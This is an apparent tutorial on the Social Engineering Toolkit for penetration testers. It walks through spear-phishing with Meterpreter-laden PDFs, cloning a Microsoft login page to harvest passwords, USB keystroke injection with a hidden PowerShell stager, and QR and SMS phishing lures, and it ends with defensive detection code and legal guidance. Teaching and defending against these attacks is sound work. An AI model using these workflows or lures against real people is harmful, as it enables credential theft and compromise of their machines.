Tool Deep Dive

Social Engineering Toolkit (SET)

The Social Engineering Toolkit automates phishing, credential harvesting, and USB attacks. Complete guide for penetration testers covering all attack vectors and legal considerations.

What Is the Social Engineering Toolkit?

The Social Engineering Toolkit (SET), created by David Seetz (aka ReL1K) and maintained by the TrustedSec team, is an open-source Python-based framework that automates human-targeted attacks. Where network tools exploit technical vulnerabilities, SET exploits the greatest attack surface in any organization: people. It automates the creation of phishing sites, the deployment of credential harvesters, the generation of malicious USB drives, and the delivery of client-side exploits via the human as the attack vector.

SET is not a hacker novelty — it is a serious penetration testing tool used by red teams, social engineering consultants, and security awareness training programs worldwide. Its integration with the Metasploit Framework means that a successful phish can immediately open a Meterpreter shell on the target's machine, making it one of the highest-impact tools in a penetration tester's arsenal.

The toolkit is pre-installed on Kali Linux and runs on any Python 3 environment with the Metasploit Framework installed. It requires root privileges for most attacks.

Installation and Startup

$ # Kali Linux (pre-installed)
$ sudo apt update && sudo apt install set

$ # Or clone from GitHub
$ git clone https://github.com/trustedsec/social-engineer-toolkit.git
$ cd social-engineer-toolkit
$ sudo python3 setup.py install

$ # Launch SET
$ sudo setoolkit

   [------------------------ Welcome to the Social Engineering Toolkit [------------------------]
                              The prime attack: human exploit
                                       8.0.5

   Select from the menu:

      1) Social-Engineering Attacks
      2) Penetration Testing (Fast-Track)
      3) Third Party Modules
      4) Update the SET
      5) Update SET configuration
      6) Help, Credits, and About

   99) Exit the Social Engineering Toolkit

  set>

Spear-Phishing Attack Workflow

Spear-phishing is SET's most impactful attack vector. The toolkit automates the creation of a convincing phishing email containing either a malicious link (to a credential harvester) or a malicious file attachment (a crafted PDF or Office document with an embedded Meterpreter payload).

set> 1
  Select from the menu:
     1) Perform a Mass Email Attack
     2) Create a FileFormat Payload
     3) Create a Social Engineering Template
     99) Return to Main Menu

set:sf> 1

  1) E-Mail Attack Single Email Address
  2) E-Mail Attack Mass Mailer
  3) Create a Social Engineering Template
  99) Return to Main Menu

set:sf> 1

  What payload do you want to generate:
    1) Meterpreter_Reverse_TCP (default)
    2) Meterpreter_Reverse_HTTPS
    3) Meterpreter_Reverse_DNS
    4) VNC Inject
    5) Set of Social-Engineering attacks

set:sf> 2   ← HTTPS for more evasive delivery

  Enter the IP ADDRESS or DOMAIN for the payload (LHOST):
192.168.1.105

  Select the port for the listener [443]:
443

  SET will generate a malicious PDF and host it
  Enter the name of your company:
Acme Corporation

  Enter the subject of the email:
Q1 2026 Financial Report — Confidential

SET then generates a weaponized PDF document with the embedded Meterpreter payload and sets up a Python SMTP server to deliver the email to the target. It also starts the Metasploit multi-handler to catch the reverse HTTPS connection when the target opens the PDF.

set:sf> send email
[*] SET has sent the phishing email to [email protected]
[*] Starting multi-handler...

[msf] Starting Metasploit listener...
[msf] Listening on https://192.168.1.105:443 — payload encoded

# When target opens the PDF:
[msf] meterpreter session opened from 192.168.1.198
[msf] OS: Windows 10 Pro 21H2 | System: X64 | Arch: x64
[meterpreter]> shell
C:\Users\jsmit\Downloads> whoami
acmecorp\jsmit

Credential Harvester — Web Clone Attack

The Credential Harvester clones a legitimate website's login page and hosts it on the attacker's machine, capturing any credentials entered. Combined with DNS spoofing or a WiFi Evil Twin, this becomes nearly undetectable to non-technical users.

set:webattack> 1
  1) Web Templates (pre-made high-quality templates)
  2) Site Cloner (clone an existing site)
  3) Custom Import (import your own HTML)
  99) Return to Webattack Menu

set:webattack> 2

  SET is now cloning: https://login.microsoftonline.com
  URL to clone: 
https://login.microsoftonline.com

[+] Cloning the target website...
[+] This may take a moment...
[+] Credential harvester is ready at: http://192.168.1.105:80
[+] Site loaded. Waiting for credentials...

[harvester] POST from 192.168.1.198
[harvester] Email: j.smith@acmecorp.com
[harvester] Password: Summer2024!MFA
[harvester] IP: 192.168.1.198 | User-Agent: Mozilla/5.0 (Windows 10)

SET automatically rewrites the cloned page's form action to submit to the local harvester script. When the user submits the form, they see a fake "Authentication Error" and are redirected to the real Microsoft login — which they'll assume was a transient glitch. The attacker captures both the username and the password.
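A check a URL sandbox or page-integrity scanner can run against a fetched page, added here as an example for this article (it is not part of SET): it flags the traits of the cloned page above, namely a password form served from a raw IP over plain HTTP and brand text that does not match the serving host. The brand host table and the sample HTML are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
# Assumed brand-to-legitimate-host table, illustrative only (not a vendor list).
BRAND_HOSTS = {"microsoft": {"login.microsoftonline.com", "login.live.com"}}
# Constructed sample: a cloned Microsoft sign-in page with its form action rewritten.
CLONED_PAGE = (
    '<html><head><title>Sign in to your account - Microsoft</title></head><body>'
    '<form action="index.php" method="post"><input type="email" name="loginfmt">'
    '<input type="password" name="passwd"><input type="submit"></form></body></html>'
)

class _LoginFormScanner(HTMLParser):
    """Collects forms that contain a password field, plus all visible text."""
    def __init__(self):
        super().__init__()
        self.forms, self.text, self._form = [], [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form["password"] = True
    def handle_endtag(self, tag):
        if tag == "form" and self._form:
            self.forms.append(self._form)
            self._form = None
    def handle_data(self, data):
        self.text.append(data.lower())

def analyze_login_page(page_url, html):
    """Return sorted findings for a fetched page; an empty list means nothing flagged."""
    scanner = _LoginFormScanner()
    scanner.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    findings = set()
    for form in (f for f in scanner.forms if f["password"]):
        target = urlparse(urljoin(page_url, form["action"]))  # resolve relative actions
        if target.scheme != "https":
            findings.add("password form submits over plain HTTP")
        try:  # a literal IP as the form target is a strong harvester signal
            ipaddress.ip_address(target.hostname or "")
            findings.add(f"password form posts to raw IP {target.hostname}")
        except ValueError:
            pass
    body = " ".join(scanner.text)  # brand words in visible text vs. serving host
    for brand, hosts in BRAND_HOSTS.items():
        if brand in body and page_host not in hosts:
            findings.add(f"page references {brand} but is served from {page_host}")
    return sorted(findings)
```

Run against `CLONED_PAGE` at `http://192.168.1.105:80/` it reports all three traits; the same markup served from `login.microsoftonline.com` over HTTPS with a same-origin action reports nothing.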

Common Clone Targets

  • Microsoft Online (Azure/365) — Most common in enterprise assessments
  • Okta, Auth0, Ping Identity — SSO portals for SAML-based authentication
  • Corporate VPN portals — AnyConnect, Fortinet SSL-VPN, OpenVPN
  • Google Workspace — Gmail, Drive, Calendar login pages
  • LinkedIn, Facebook, Twitter — For OSINT-linked social engineering

Java Applet Attack

The Java Applet attack is one of SET's most famous vectors. It spawns a fake Java applet that requests the target's permission to run — a permission dialog that most users instinctively click "Allow" on. The applet runs with full system privileges and delivers a Meterpreter payload. This attack works on Windows and macOS systems with Java installed.

set:attack> 3
  The Java Applet Attack is a unique way to compromise targets
  using signed Java applets. This vectors currently works on:
    - Windows (all browsers with Java plugin)
    - macOS (Safari with Java plugin)
  Note: Modern browsers have largely disabled Java applets by default since 2017.

  Enter the IP address for the payload (reverse):
192.168.1.105

[+] Self-signed applet generated and ready
[+] Applet will be served when target visits: http://192.168.1.105
[!] Modern browsers will show a security warning and block execution

Java Applet Status

The Java Applet attack is largely historical in 2026 — modern browsers disabled Java applets by default years ago, and Java itself has fallen out of common use. However, it remains a valid attack vector in legacy enterprise environments where internal applications still require Java Web Start or legacy Java plugins. Always check the target environment before dismissing it.

USB Attack Vector

The USB Attacks module generates malicious payloads on USB drives that execute automatically when the drive is plugged into a Windows machine. The original attack relied on Windows AutoRun/AutoPlay, but Microsoft disabled this feature in Windows 7 and later. SET has evolved to use multiple payload delivery mechanisms.

How the Attack Works (Modern Variant)

set:attack> 4

  USB Attack Vector Options:
    1) Teensy USB Attack (Arduino-based HID injection)
    2) Scheduled Tasks (VBScript via autorun.inf substitution)
    3) DLL Hiding (Masquerade as a legitimate USB file)
    99) Return to Main Menu

set:usb> 1

  Generating HID keystroke injection payload...
  Select payload:
    1) Meterpreter_Reverse_TCP
    2) Shell Reverse TCP

set:usb> 1

  LHOST: 
192.168.1.105
  LPORT: [4444]: 

[+] Teensy payload created: /root/.set/reports/usb/teensy.hex
[+] Flash this file to a Teensy microcontroller using Arduino IDE
[+] When plugged in, the device will type and execute the payload

Why It Still Works

The modern USB attack isn't about AutoRun anymore — it's about human psychology. Someone finds a USB drive in a parking lot, sees an intriguing label ("Salary Info 2026.xlsx" or "HR Questions"), and plugs it into their laptop to find the owner. The moment they do, the HID (Human Interface Device) on the USB drive starts typing — mimicking a keyboard — and executes a PowerShell payload that downloads and runs Meterpreter.

The key to success is the social engineering layer: a well-labeled USB drive dropped in a company parking lot with an HR or payroll filename will have a high plug-in rate. Studies by Compair and the University of Illinois found that 48% of people who found USB drives in public places plugged them into personal or work computers.

$ # The VBScript payload that gets typed and executed by the HID device
$ cat /root/.set/reports/usb/payload.vbs

Set oShell = CreateObject("WScript.Shell")
oShell.Run "powershell -windowstyle hidden -enc WwBoAG8AdABlAC0AUABhAHMAcwB3AC8A..."
[...] Base64-encoded PowerShell Meterpreter download-and-execute stager

QR Code Attacks

SET can generate a QR code that, when scanned by a mobile device, directs the victim to a credential harvester. This is particularly effective in physical social engineering engagements where you can't easily send an email.

set:webattack> 5
  QRCode Attack Vector
  Enter the URL for the QR code:
http://192.168.1.105/get?token=acmecorp_vpn

[+] QR Code generated and saved to: /root/.set/reports/qr_acmecorp.png
[+] Print this QR code and place it on a poster or flyer
[+] Users scanning the code will be directed to your credential harvester

Common deployment scenarios for QR code attacks:

  • Printing fake "Free WiFi" QR codes and sticking them over legitimate signage in office buildings
  • Placing QR codes on "employee appreciation" flyers near the cafeteria
  • Including QR codes in physical mail sent to executives (quishing — QR phishing)

SMS Phishing (Smishing)

SET includes a built-in SMS phishing module that sends SMS messages to targets. Combined with a convincing message ("Your corporate VPN requires re-authentication: http://vpn.acmecorp.fake-site.com"), it provides a channel for social engineering that bypasses email security gateways entirely.

set:sms> 1
  SMS Attack — Select a predefined template or write a custom message
    1) IT Security Alert — Password Expired
    2) HR Department — Benefits Update Required
    3) CEO Request — Urgent Wire Transfer
    4) IT Helpdesk — VPN Maintenance
    99) Custom message

set:sms> 4

  Enter the phone number or file of numbers:
+1-555-0100

  Select the sending method:
    1) Use built-in SMTP (anonymous)
    2) Use email-to-SMS gateway (requires carrier knowledge)

  Sending SMS via SMTP relay...
[+] SMS delivered: IT Helpdesk — VPN maintenance window tonight 11PM-1AM. Re-authenticate at: http://vpn.acmecorp.link

SMS Gateway Restrictions

Sending SMS messages programmatically from a laptop requires either an SMTP-to-SMS gateway (which most carriers have restricted) or a cheap SMS API service like Twilio. In practice, many penetration testers use dedicated smishing platforms like Gophish or the Nuclei framework's SMS module for more reliable delivery.

How Defenders Detect SET Attacks

Organizations can implement several controls to detect and block SET attacks:

  • Email security gateways: Most modern email security platforms (Microsoft Defender for Office 365, Google Workspace, Proofpoint) flag emails with suspicious characteristics that SET-generated emails often exhibit: mismatched sender domains, suspicious redirect links, and known SET SMTP patterns.
  • URL sandboxing: Clicking a SET harvester link in a protected environment will trigger the sandbox to visit the page, detect the credential collection form, and flag the domain as a phishing site — often within minutes of it going live.
  • Web phishing intelligence feeds: Services like PhishTank, Google Safe Browsing, and OpenPhish maintain blocklists of known phishing domains. If your phishing site appears on these feeds, it's effectively burned.
  • Multi-factor authentication (MFA): Even if credentials are captured, a properly configured MFA policy (especially hardware FIDO2 keys or authenticator app push notifications) makes the stolen credentials useless for account takeover.
  • User awareness training: Regular phishing simulations using tools like KnowBe4 or Gophish train users to recognize the signs of a SET-generated phishing email: urgency, mismatched sender addresses, suspicious links.
  • HTTPS certificate inspection: SSL/TLS certificates on SET-hosted phishing sites are almost always self-signed or from Let's Encrypt — legitimate corporate login pages use certificates from trusted commercial CAs. Security gateways that inspect HTTPS traffic will flag the certificate chain anomalies.
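The gateway checks above applied to the spear-phishing email from the workflow earlier, written as an added example rather than any vendor's or SET's code: it scores a raw message on From/Return-Path domain mismatch, anchor text that hides a raw-IP target, and a PDF attachment under an urgent subject. The keyword list and the sample message are constructed assumptions.

```python
import re
from email import message_from_string, policy
from urllib.parse import urlparse
URGENT = ("confidential", "urgent", "expired", "re-authenticate", "wire")  # assumed list
HREF_RE = re.compile(r'<a[^>]+href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
URL_RE = re.compile(r"https?://[^\s<>\"']+")
# Constructed sample modelled on the spear-phish above; the PDF body is a placeholder.
SAMPLE = """Return-Path: <report@192.168.1.105>
From: Acme Finance <finance@acmecorp.com>
Subject: Q1 2026 Financial Report - Confidential
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<p>Review at <a href="http://192.168.1.105/report">https://portal.acmecorp.com/report</a></p>
--b1
Content-Type: application/pdf; name="Q1_Report.pdf"

%PDF-1.4 placeholder
--b1--
"""
def _host(url):
    return (urlparse(url).hostname or "").lower()

def _domain(header):  # domain part of an address header such as From or Return-Path
    m = re.search(r"@([\w.-]+)", str(header or ""))
    return m.group(1).lower() if m else ""

def triage_message(raw):
    """Return (finding_count, sorted findings) for one message given as a string."""
    msg = message_from_string(raw, policy=policy.default)
    findings = set()
    from_dom, path_dom = _domain(msg["From"]), _domain(msg["Return-Path"])
    if path_dom and from_dom != path_dom:
        findings.add(f"From domain {from_dom} differs from Return-Path domain {path_dom}")
    subject = str(msg["Subject"] or "").lower()
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "application/pdf" and any(k in subject for k in URGENT):
            findings.add(f"PDF attachment {part.get_filename()} under an urgent subject")
        if ctype != "text/html":
            continue
        for href, shown in HREF_RE.findall(part.get_content()):
            visible = URL_RE.search(shown)  # anchor text that looks like a URL
            if visible and _host(visible.group()) != _host(href):
                findings.add(f"link text shows {_host(visible.group())} but points to {_host(href)}")
            if _host(href).replace(".", "").isdigit():  # IPv4 literal: self-hosted harvester tell
                findings.add(f"link points to raw IP {_host(href)}")
    return len(findings), sorted(findings)
```

The sample yields four findings; rewriting its sender, link and subject to consistent corporate values yields none, which is the baseline a gateway rule would be tuned against.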

Legal Warning — This Is Not Optional Reading

The Social Engineering Toolkit requires explicit, written, signed authorization from the target organization before use. Social engineering attacks — particularly spear-phishing and USB drop attacks — are treated with the highest legal scrutiny because they involve deceiving human beings into taking security-compromising actions. The CFAA (US), Computer Misuse Act (UK), and equivalent laws globally all specifically cover unauthorized access obtained through deception. Violations can result in felony charges with sentences of up to 10–20 years in the US under the CFAA. Always use SET within a signed Rules of Engagement document with a defined scope.

Key legal requirements:

  • Written scope: The engagement letter must specifically name social engineering attacks as an authorized technique
  • Target identification: Know exactly which individuals are in scope — SET attacks that capture credentials from unintended targets (a co-worker's computer during a USB drop test) create legal exposure
  • Data handling: Any credentials harvested must be handled as highly sensitive data, encrypted, and destroyed after the assessment
  • Timing constraints: Define when the attack occurs — social engineering during off-hours or holidays may have unintended real-world consequences